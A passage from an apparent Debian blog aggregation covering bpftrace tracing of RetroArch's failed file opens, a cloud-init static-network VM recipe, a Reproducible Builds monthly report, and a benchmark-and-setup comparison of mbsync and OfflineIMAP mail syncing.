            str(@filename[tid]));
    }
    delete(@filename[tid]);
}

END
{
    clear(@filename);
}
I had to install bpftrace (apt install bpftrace) and then I ran bpftrace -o retro.log retro-failed-open-snoop.bt as root and fired up retroarch as a normal user.
bpftrace failed open log for retroarch
Attaching 6 probes...
Tracing open syscalls... Hit Ctrl-C to end.
PID    COMM             ERR PATH
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/glibc-hwcaps/x86-64-v2/lib
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/tls/x86_64/x86_64/libpulse
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/tls/x86_64/libpulsecommon-
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/tls/x86_64/libpulsecommon-
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/tls/libpulsecommon-16.1.so
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/x86_64/x86_64/libpulsecomm
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/x86_64/libpulsecommon-16.1
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/x86_64/libpulsecommon-16.1
3394   retroarch          2 /etc/gcrypt/hwf.deny
3394   retroarch          2 /lib/x86_64-linux-gnu/glibc-hwcaps/x86-64-v2/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/tls/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/tls/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/glibc-hwcaps/x86-64-v2/libgamemode.so
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/tls/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/tls/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/libgamemode.so.0
3394   retroarch          2 /lib/glibc-hwcaps/x86-64-v2/libgamemode.so.0
3394   retroarch          2 /lib/tls/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/tls/libgamemode.so.0
3394   retroarch          2 /lib/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/libgamemode.so.0
3394   retroarch          2 /usr/lib/glibc-hwcaps/x86-64-v2/libgamemode.so.0
3394   retroarch          2 /usr/lib/tls/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/tls/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/libgamemode.so
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/libgamemode.so
3394   retroarch          2 /lib/libgamemode.so
3394   retroarch          2 /usr/lib/libgamemode.so
3394   retroarch          2 /lib/x86_64-linux-gnu/libdecor-0.so
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/libdecor-0.so
3394   retroarch          2 /lib/libdecor-0.so
3394   retroarch          2 /usr/lib/libdecor-0.so
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/dri/tls/iris_dri.so
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/glibc-hwcaps/x86-64-v2/libedit.so.
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/tls/x86_64/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/tls/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/tls/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/tls/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/x86_64/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/libedit.so.2
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /home/noodles/.Xdefaults-udon
3394   retroarch          2 /home/noodles/.icons/default/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/default/index.theme
3394   retroarch          2 /usr/share/icons/default/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/default/cursors/0000000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/Adwaita/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/Adwaita/index.theme
3394   retroarch          2 /usr/share/icons/Adwaita/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/Adwaita/cursors/0000000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/hicolor/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/hicolor/index.theme
3394   retroarch          2 /usr/share/icons/hicolor/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/hicolor/cursors/0000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/hicolor/index.theme
3394   retroarch          2 /home/noodles/.XCompose
3394   retroarch          2 /home/noodles/.icons/default/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/default/index.theme
3394   retroarch          2 /usr/share/icons/default/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/default/cursors/0000000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/Adwaita/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/Adwaita/index.theme
3394   retroarch          2 /usr/share/icons/Adwaita/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/Adwaita/cursors/0000000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/hicolor/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/hicolor/index.theme
3394   retroarch          2 /usr/share/icons/hicolor/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/hicolor/cursors/0000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/hicolor/index.theme
3394   retroarch          2 /usr/share/libretro/assets/xmb/monochrome/png/disc.png
3394   retroarch          2 /usr/share/libretro/assets/xmb/monochrome/sounds
3394   retroarch          2 /usr/share/libretro/assets/sounds
3394   retroarch          2 /sys/class/power_supply/ACAD
3394   retroarch          2 /sys/class/power_supply/ACAD
3394   retroarch          2 /usr/share/libretro/assets/xmb/monochrome/png/disc.png
3394   retroarch          2 /usr/share/libretro/assets/ozone/sounds
3394   retroarch          2 /usr/share/libretro/assets/sounds
This was incredibly useful - the only theme image I was missing was disc.png from XMB Monochrome (which lacks an SVG source). I also discovered the optional runtime loading of GameMode. This is available in Debian, so it was a simple matter to add libgamemode0 to the binary package Recommends. So, a very basic example of using bpftrace, but a remarkably useful intro to it from my point of view!
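As an aside, the strace approach mentioned at the start of this post could have produced similar information. A hedged sketch, assuming a reasonably recent strace that supports the -Z/--failed-only option; the output format obviously differs from the bpftrace log above:

strace -f -Z -e trace=open,openat -o retro-strace.log retroarch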

22 August 2022

Simon Josefsson: Static network config with Debian Cloud images

I self-host some services on virtual machines (VMs), and I'm currently using Debian 11.x as the host machine, relying on the libvirt infrastructure to manage QEMU/KVM machines. While everything has worked fine for years (including on Debian 10.x), there has always been one issue causing a one-minute delay every time I install a new VM: the default images run a DHCP client that never succeeds in my environment. I never found a way to disable DHCP in the image, and none of the documented ways through cloud-init that I have tried worked. A couple of days ago, after reading the AlmaLinux wiki, I found a solution that works with Debian. The following commands create a Debian VM with a static network configuration, without the annoying one-minute DHCP delay. The three essential cloud-init keywords are the NoCloud meta-data parameters dsmode:local and the static network-interfaces setting, combined with the user-data bootcmd keyword. I'm using a Raptor CS Talos II ppc64el machine, so replace the image link with a genericcloud amd64 image if you are using x86.
wget https://cloud.debian.org/images/cloud/bullseye/latest/debian-11-generic-ppc64el.qcow2
cp debian-11-generic-ppc64el.qcow2 foo.qcow2
cat>meta-data
dsmode: local
network-interfaces: |
 iface enp0s1 inet static
 address 192.168.98.14/24
 gateway 192.168.98.12
^D
cat>user-data
#cloud-config
fqdn: foo.mydomain
manage_etc_hosts: true
disable_root: false
ssh_pwauth: false
ssh_authorized_keys:
- ssh-ed25519 AAAA...
timezone: Europe/Stockholm
bootcmd:
- rm -f /run/network/interfaces.d/enp0s1
- ifup enp0s1
^D
virt-install --name foo --import --os-variant debian10 --disk foo.qcow2 --cloud-init meta-data=meta-data,user-data=user-data
Unfortunately virt-install from Debian 11 does not support the cloud-init network-config parameter, so if you want to use a version 2 network configuration with cloud-init (to specify IPv6 addresses, for example) you need to replace the final virt-install command with the following.
cat>network_config_static.cfg
version: 2
ethernets:
  enp0s1:
    dhcp4: false
    addresses: [ 192.168.98.14/24, fc00::14/7 ]
    gateway4: 192.168.98.12
    gateway6: fc00::12
    nameservers:
      addresses: [ 192.168.98.12, fc00::12 ]
^D
cloud-localds -v -m local --network-config=network_config_static.cfg seed.iso user-data
virt-install --name foo --import --os-variant debian10 --disk foo.qcow2 --disk seed.iso,readonly=on --noreboot
virsh start foo
virsh detach-disk foo vdb --config
virsh console foo
There are still some warnings like the following, but they do not seem to cause any problems: [FAILED] Failed to start Initial cloud-init job (pre-networking). Finally, if you do not want the cloud-init tools installed in your VMs, I found the following set of additional user-data commands helpful. Cloud-init will not be enabled on first boot, and a cron job will be added that purges some unwanted packages.
runcmd:
- touch /etc/cloud/cloud-init.disabled
- apt-get update && apt-get dist-upgrade -uy && apt-get autoremove --yes --purge && printf '#!/bin/sh\n( rm /etc/cloud/cloud-init.disabled /etc/cloud/cloud.cfg.d/01_debian_cloud.cfg && apt-get purge --yes cloud-init cloud-guest-utils cloud-initramfs-growroot genisoimage isc-dhcp-client && apt-get autoremove --yes --purge && rm -f /etc/cron.hourly/cloud-cleanup && shutdown --reboot +1; ) 2>&1 | logger -t cloud-cleanup\n' > /etc/cron.hourly/cloud-cleanup && chmod +x /etc/cron.hourly/cloud-cleanup && reboot &
The production script I'm using is a bit more complicated, but can be downloaded as vello-vm. Happy hacking!

5 February 2022

Reproducible Builds: Reproducible Builds in January 2022

Welcome to the January 2022 report from the Reproducible Builds project. In our reports, we try to outline the most important things that have been happening in the past month. As ever, if you are interested in contributing to the project, please visit our Contribute page on our website.
An interesting blog post was published by Paragon Initiative Enterprises about Gossamer, a proposal for securing the PHP software supply-chain. Utilising code-signing and third-party attestations, Gossamer aims to mitigate the risks within the notorious PHP world via publishing attestations to a transparency log. Their post, titled Solving Open Source Supply Chain Security for the PHP Ecosystem goes into some detail regarding the design, scope and implementation of the system.
This month, the Linux Foundation announced SupplyChainSecurityCon, a conference focused on exploring the security threats affecting the software supply chain, sharing best practices and mitigation tactics. The conference is part of the Linux Foundation's Open Source Summit North America and will take place June 21st-24th 2022, both virtually and in Austin, Texas.

Debian There was significant progress made in the Debian Linux distribution this month, including:

Other distributions kpcyrd reported on Twitter about the release of version 0.2.0 of pacman-bintrans, an experiment with binary transparency for the Arch Linux package manager, pacman. This new version is now able to query rebuilderd to check if a package was independently reproduced.
In the world of openSUSE, meanwhile, Bernhard M. Wiedemann posted his monthly reproducible builds status report.

diffoscope diffoscope is our in-depth and content-aware diff utility. Not only can it locate and diagnose reproducibility issues, it can provide human-readable diffs from many kinds of binary formats. This month, Chris Lamb prepared and uploaded versions 199, 200, 201 and 202 to Debian unstable (that were later backported to Debian bullseye-backports by Mattia Rizzolo), as well as made the following changes to the code itself:
  • New features:
    • First attempt at incremental output support with a timeout. Now passing, for example, --timeout=60 will mean that diffoscope will not recurse into any sub-archives after 60 seconds total execution time has elapsed. Note that this is not a fixed/strict timeout due to implementation issues. [ ][ ]
    • Support both variants of odt2txt, including the one provided by the unoconv package. [ ]
  • Bug fixes:
    • Do not return with a UNIX exit code of 0 if we encounter a file whose human-readable metadata matches literal file contents. [ ]
    • Don't fail if comparing a nonexistent file with a .pyc file (and add test). [ ][ ]
    • If the debian.deb822 module raises any exception on import, re-raise it as an ImportError. This should fix diffoscope on some Fedora systems. [ ]
    • Even if a Sphinx .inv inventory file is labelled "The remainder of this file is compressed using zlib", it might not actually be. In this case, don't traceback and simply return the original content. [ ]
  • Documentation:
    • Improve documentation for the new --timeout option due to a few misconceptions. [ ]
    • Drop reference in the manual page claiming the ability to compare non-existent files on the command-line. (This has not been possible since version 32 which was released in September 2015). [ ]
    • Update "X has been modified after NT_GNU_BUILD_ID has been applied" messages to, for example, not duplicate the full filename in the diffoscope output. [ ]
  • Codebase improvements:
    • Tidy some control flow. [ ]
    • Correct a recompile typo. [ ]
In addition, Alyssa Ross fixed the comparison of CBFS names that contain spaces [ ], Sergei Trofimovich fixed whitespace for compatibility with version 21.12 of the Black source code reformatter [ ] and Zbigniew Jędrzejewski-Szmek fixed JSON detection with a new version of file [ ].

Testing framework The Reproducible Builds project runs a significant testing framework at tests.reproducible-builds.org, to check packages and other artifacts for reproducibility. This month, the following changes were made:
  • Frédéric Pierret (fepitre):
    • Add Debian bookworm to package set creation. [ ]
  • Holger Levsen:
    • Install the po4a package where appropriate, as it is needed for the Reproducible Builds website job [ ]. In addition, also run the i18n.sh and contributors.sh scripts [ ].
    • Correct some grammar in Debian live image build output. [ ]
    • Shell monitor improvements:
      • Only show the offline node section if there are offline nodes. [ ]
      • Colorise offline nodes. [ ]
      • Shrink screen usage. [ ][ ][ ]
    • Node health check improvements:
      • Detect if live package builds encounter incomplete snapshots. [ ][ ][ ]
      • Detect if a host is running with today's date (when it should be set artificially in the future). [ ]
    • Use the devscripts package from bullseye-backports on Debian nodes. [ ]
    • Use the Munin monitoring package from bullseye-backports on Debian nodes too. [ ]
    • Update New Year handling, needed to be able to detect real and fake dates. [ ][ ]
    • Improve the error message of the script that powercycles the arm64 architecture nodes hosted by Codethink. [ ]
  • Mattia Rizzolo:
    • Use the new --timeout option added in diffoscope version 202. [ ]
  • Roland Clobus:
    • Update the build scripts now that the hooks for live builds are maintained upstream in the live-build repository. [ ]
    • Show info lines in Jenkins when reproducible hooks have been active. [ ]
    • Use unique folders for the artifacts from each live Debian version. [ ]
  • Vagrant Cascadian:
    • Switch the Debian armhf architecture nodes to use new proxy. [ ]
    • Misc. node maintenance. [ ].

Upstream patches The Reproducible Builds project attempts to fix as many currently-unreproducible packages as possible. In January, we wrote a large number of such patches, including:

And finally If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. You can also get in touch with us via:

21 November 2021

Antoine Beaupré: mbsync vs OfflineIMAP

After recovering from my latest email crash (previously, previously), I had to figure out which tool I should be using. I had many options but I figured I would start with a popular one (mbsync). But I also evaluated OfflineIMAP which was resurrected from the Python 2 apocalypse, and because I had used it before, for a long time. Read on for the details.

Benchmark setup All programs were tested against a Dovecot 1:2.3.13+dfsg1-2 server, running Debian bullseye. The client is a Purism 13v4 laptop with a Samsung SSD 970 EVO 1TB NVMe drive. The server is a custom build with an AMD Ryzen 5 2600 CPU, and a RAID-1 array made of two NVMe drives (Intel SSDPEKNW010T8 and WDC WDS100T2B0C). The mail spool I am testing against has almost 400k messages and takes 13GB of disk space:
$ notmuch count --exclude=false
372758
$ du -sh --exclude xapian Maildir
13G Maildir
The baseline we are comparing against is SMD (syncmaildir), which performs the sync in about 7-8 seconds locally (3.5 seconds for each push/pull command) and about 10-12 seconds remotely. Anything close to that or better is good enough. I do not have recent numbers for an SMD full sync baseline, but the setup documentation mentions 20 minutes for a full sync. That was a few years ago, and the spool has obviously grown since then, so that is not a reliable baseline. A baseline for a full sync might also be set with rsync, which copies files at nearly 40MB/s, or 317Mb/s!
anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian  shell.anarc.at:Maildir/ Maildir/
 12,647,814,731 100%   37.85MB/s    0:05:18 (xfr#394981, to-chk=0/395815)    
72.38user 106.10system 5:19.59elapsed 55%CPU (0avgtext+0avgdata 15988maxresident)k
8816inputs+26305112outputs (0major+50953minor)pagefaults 0swaps
That is 5 minutes to transfer the entire spool. Incremental syncs are obviously pretty fast too:
anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian  shell.anarc.at:Maildir/ Maildir/
              0   0%    0.00kB/s    0:00:00 (xfr#0, to-chk=0/395815)    
1.42user 0.81system 0:03.31elapsed 67%CPU (0avgtext+0avgdata 14100maxresident)k
120inputs+0outputs (3major+12709minor)pagefaults 0swaps
As an extra curiosity, here's the performance with tar, pretty similar to rsync, minus incrementals, which I cannot be bothered to figure out right now:
anarcat@angela:tmp(main)$ time ssh shell.anarc.at tar --exclude xapian -cf - Maildir/ | pv -s 13G | tar xf -
56.68user 58.86system 5:17.08elapsed 36%CPU (0avgtext+0avgdata 8764maxresident)k
0inputs+0outputs (0major+7266minor)pagefaults 0swaps
12,1GiO 0:05:17 [39,0MiB/s] [===================================================================> ] 92%
Interesting that rsync manages to almost beat a plain tar on file transfer; I'm actually surprised by how well it performs here, considering there are many little files to transfer. (But then again, this maybe is exactly where rsync shines: while tar needs to glue all those little files together, rsync can just directly talk to the other side and tell it to do live changes. Something to look at in another article maybe?) Since both ends are NVMe drives, those should easily saturate a gigabit link. And in fact, a backup of the server mail spool achieves a much faster transfer rate on disks:
anarcat@marcos:~$ tar fc - Maildir | pv -s 13G > Maildir.tar
15,0GiO 0:01:57 [ 131MiB/s] [===================================] 115%
That's 131MiB per second, vastly faster than the gigabit link. The client has similar performance:
anarcat@angela:~(main)$ tar fc - Maildir | pv -s 17G > Maildir.tar
16,2GiO 0:02:22 [ 116MiB/s] [==================================] 95%
So those disks should be able to saturate a gigabit link, and they are not the bottleneck on fast links. Which begs the question of what is blocking performance of a similar transfer over the gigabit link, but that's another question altogether, because no sync program ever reaches the above performance anyways. Finally, note that when I migrated to SMD, I wrote a small performance comparison that could be interesting here. It shows SMD to be faster than OfflineIMAP, but not as much as we see here. In fact, it looks like OfflineIMAP slowed down significantly since then (May 2018), but this could be due to my larger mail spool as well.

mbsync The isync (AKA mbsync) project is written in C and supports syncing Maildir and IMAP folders, with possibly multiple replicas. I haven't tested this but I suspect it might be possible to sync between two IMAP servers as well. It supports partial mirrors, message flags, full folder support, and "trash" functionality.

Complex configuration file I started with this .mbsyncrc configuration file:
SyncState *
Sync New ReNew Flags
IMAPAccount anarcat
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPStore anarcat-remote
Account anarcat
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir-mbsync/
Channel anarcat
# AKA Far, convert when all clients are 1.4+
Master :anarcat-remote:
# AKA Near
Slave :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
Patterns *
# Automatically create missing mailboxes, both locally and on the server
#Create Both
Create slave
# Sync the movement of messages between folders and deletions, add after making sure the sync works
#Expunge Both
Long gone are the days when I would spend a long time reading a manual page to figure out the meaning of every option. If that's your thing, you might like this one. But I'm more of an "EXAMPLES section" kind of person now, and I somehow couldn't find a sample file on the website. I started from the Arch wiki one, but it's actually not great because it's made for Gmail (which is not a usual Dovecot server). So a sample config file in the manpage would be a great addition. Thankfully, the Debian package ships one in /usr/share/doc/isync/examples/mbsyncrc.sample, but I only found that after I wrote my configuration. It was still useful and I recommend people take a look if they want to understand the syntax. Also, that syntax is a little overly complicated. For example, Far needs colons, like:
Far :anarcat-remote:
Why? That seems just too complicated. I also found that sections are not clearly identified: IMAPAccount and Channel mark section beginnings, for example, which is not at all obvious until you learn about mbsync's internals. There are also weird ordering issues: the SyncState option needs to be before IMAPAccount, presumably because it's global. Using a more standard format like .INI or TOML could improve that situation.

Stellar performance A transfer of the entire mail spool takes 56 minutes and 6 seconds, which is impressive. It's not quite "line rate": the resulting mail spool was 12GB (which is a problem, see below), which turns out to be about 29Mbit/s and therefore not maxing the gigabit link, and an order of magnitude slower than rsync. The incremental runs are roughly 2 seconds, which is even more impressive, as that's actually faster than rsync:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.015       0.052       1.930       2.029       2.105       
user        0.660       0.040       0.592       0.661       0.722       
sys         0.338       0.033       0.268       0.341       0.387    
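(A note on methodology: these tables come from the multitime benchmarking tool. The exact invocation is not shown in the post, but it was presumably something along these lines, where the run count is my guess:)
multitime -n 5 mbsync -a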
Those tests were performed with isync 1.3.0-2.2 on Debian bullseye. Tests with a newer isync release originally failed because of a corrupted message that triggered bug 999804 (see below). Running 1.4.3 under valgrind works around the bug, but adds a 50% performance cost, the full sync running in 1h35m. Once the upstream patch is applied, performance with 1.4.3 is fairly similar, considering that the new sync included the register folder with 4000 messages:
120.74user 213.19system 59:47.69elapsed 9%CPU (0avgtext+0avgdata 105420maxresident)k
29128inputs+28284376outputs (0major+45711minor)pagefaults 0swaps
That is ~13GB in ~60 minutes, which gives us 28.3Mbps. Incrementals are also pretty similar to 1.3.x, again considering the double-connect cost:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.500       0.087       2.340       2.491       2.629       
user        0.718       0.037       0.679       0.711       0.793       
sys         0.322       0.024       0.284       0.320       0.365
Those tests were all done on a Gigabit link, but what happens on a slower link? My server uplink is slow: 25 Mbps down, 6 Mbps up. There, mbsync is worse than the SMD baseline:
===> multitime results
1: mbsync -a
Mean        Std.Dev.    Min         Median      Max
real        31.531      0.724       30.764      31.271      33.100      
user        1.858       0.125       1.721       1.818       2.131       
sys         0.610       0.063       0.506       0.600       0.695       
That's 30 seconds for a sync, which is an order of magnitude slower than SMD.

Great user interface Compared to OfflineIMAP and (ahem) SMD, the mbsync UI is kind of neat:
anarcat@angela:~(main)$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 1/2  B: 204/205  F: +0/0 *0/0 #0/0  N: +1/200 *0/0 #0/0
(Note that nice switch away from slavery-related terms too.) The display is minimal, and yet informative. It's not obvious what it all means at first glance, but the manpage is useful at least for clarifying that:
This represents the cumulative progress over channels, boxes, and messages affected on the far and near side, respectively. The message counts represent added messages, messages with updated flags, and trashed messages, respectively. No attempt is made to calculate the totals in advance, so they grow over time as more information is gathered. (Emphasis mine).
In other words:
  • C 2/2: channels done/total (2 done out of 2)
  • B 204/205: mailboxes done/total (204 out of 205)
  • F: changes on the far side
  • N: +10/200 *0/0 #0/0: changes on the "near" side:
    • +10/200: 10 out of 200 messages downloaded
    • *0/0: no flag changed
    • #0/0: no message deleted
You get used to it, in a good way. It does not, unfortunately, show up when you run it in systemd, which is a bit annoying as I like to see a summary of mail traffic in the logs.

Interoperability issue In my notmuch setup, I have bound key S to "mark spam", which basically assigns the tag spam to the message and removes a bunch of others. Then I have a notmuch-purge script which moves that message to the spam folder, for training purposes. It basically does this:
notmuch search --output=files --format=text0 "$search_spam" \
    | xargs -r -0 mv -t "$HOME/Maildir/${PREFIX}junk/cur/"
This method, which worked fine in SMD (and also OfflineIMAP) created this error on sync:
Maildir error: duplicate UID 37578.
And indeed, there are now two messages with that UID in the mailbox:
anarcat@angela:~(main)$ find Maildir/.junk/ -name '*U=37578*'
Maildir/.junk/cur/1637427889.134334_2.angela,U=37578:2,S
Maildir/.junk/cur/1637348602.2492889_221804.angela,U=37578:2,S
This is actually a known limitation or, as mbsync(1) calls it, a "RECOMMENDATION":
When using the more efficient default UID mapping scheme, it is important that the MUA renames files when moving them between Maildir folders. Mutt always does that, while mu4e needs to be configured to do it:
(setq mu4e-change-filenames-when-moving t)
So it seems I would need to fix my script. It's unclear how the paths should be renamed, which is unfortunate, because I would need to change my script to adapt to mbsync, but I can't tell how just from reading the above. (A manual fix is actually to rename the file to remove the U= field: mbsync will generate a new one and then sync correctly.) Fortunately, someone else already fixed that issue: afew, a notmuch tagging script (much puns, such hurt), has a move mode that can rename files correctly, specifically designed to deal with mbsync. I had already been told about afew, but it's one more reason to standardize my notmuch hooks on that project, it looks like. Update: I have tried to use afew and found it has significant performance issues. It also has a completely different paradigm to what I am used to: it assumes all incoming mail has a new tag and lays its own tags on top of that (inbox, sent, etc). It can only move files from one folder at a time (see this bug), which breaks my spam training workflow. In general, I sync my tags into folders (e.g. ham, spam, sent) and message flags (e.g. inbox is F, unread is "not S", etc), and afew is not well suited for this (although there are hacks that try to fix this). I have worked hard to make my tagging scripts idempotent, and it's something afew doesn't currently have. Still, it would be better to have that code in Python than bash, so maybe I should consider my options here.
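For what it's worth, one possible adaptation of the notmuch-purge snippet above (not the author's actual fix, just a sketch of the manual workaround just described, written for bash) would be to strip the ,U=NNN part of the filename while moving, so mbsync assigns a fresh UID:
notmuch search --output=files --format=text0 "$search_spam" |
  while IFS= read -r -d '' path; do
    mv "$path" "$HOME/Maildir/.junk/cur/$(basename "$path" | sed 's/,U=[0-9]*//')"
  done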

Stability issues The newer release in Debian bookworm (currently at 1.4.3) has stability issues on full sync. I filed bug 999804 in Debian about this, which led to a thread on the upstream mailing list. I have found at least three distinct crashes that could be double-free bugs "which might be exploitable in the worst case", not a reassuring prospect. The thing is: mbsync is really fast, but the downside of that is that it's written in C, and with that comes a whole set of security issues. The Debian security tracker has only three CVEs on isync, but the above issues show there could be many more. Reading the source code certainly did not make me very comfortable with trusting it with untrusted data. I considered sandboxing it with systemd (below) but having systemd run as a --user process makes that difficult. I also considered using an apparmor profile but that is not trivial because we need to allow SSH and only some parts of it... Thankfully, upstream has been diligent at addressing the issues I have found. They provided a patch within a few days which did fix the sync issues. Update: upstream actually took the issue very seriously. They not only got CVE-2021-44143 assigned for my bug report, they also audited the code and found several more issues collectively identified as CVE-2021-3657, which actually also affect 1.3 (i.e. Debian 11/bullseye/stable). Somehow my corpus doesn't trigger that issue, but it was still considered serious enough to warrant a CVE. So on the one hand: excellent response from upstream; but on the other hand: how many more of those could there be in there?

Automation with systemd The Arch wiki has instructions on how to setup mbsync as a systemd service. It suggests using the --verbose (-V) flag which is a little intense here, as it outputs 1444 lines of messages. I have used the following .service file:
[Unit]
Description=Mailbox synchronization service
ConditionHost=!marcos
Wants=network-online.target
After=network-online.target
Before=notmuch-new.service
[Service]
Type=oneshot
ExecStart=/usr/bin/mbsync -a
Nice=10
IOSchedulingClass=idle
NoNewPrivileges=true
[Install]
WantedBy=default.target
And the following .timer:
[Unit]
Description=Mailbox synchronization timer
ConditionHost=!marcos
[Timer]
OnBootSec=2m
OnUnitActiveSec=5m
Unit=mbsync.service
[Install]
WantedBy=timers.target
Note that we trigger notmuch through systemd, with the Before= ordering above and also by adding mbsync.service to the notmuch-new.service file:
[Unit]
Description=notmuch new
After=mbsync.service
[Service]
Type=oneshot
Nice=10
ExecStart=/usr/bin/notmuch new
[Install]
WantedBy=mbsync.service
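With those units in place, enabling the whole thing is the usual systemd user-unit dance; something like the following should do, where the list-timers and journalctl calls are just optional sanity checks:
systemctl --user daemon-reload
systemctl --user enable --now mbsync.timer
systemctl --user list-timers mbsync.timer
journalctl --user-unit=mbsync.service --since today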
An improvement over polling repeatedly with a .timer would be to wake up only on IMAP notify, but neither imapnotify nor goimapnotify seem to be packaged in Debian. It would also not cover the "sent folder" use case, where we need to wake up on local changes.

Password-less setup The sample file suggests this should work:
IMAPStore remote
Tunnel "ssh -q host.remote.com /usr/sbin/imapd"
Add BatchMode, restrict to IdentitiesOnly, provide a password-less key just for this, add compression (-C), find the Dovecot imap binary, and you get this:
IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"
And it actually seems to work:
$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
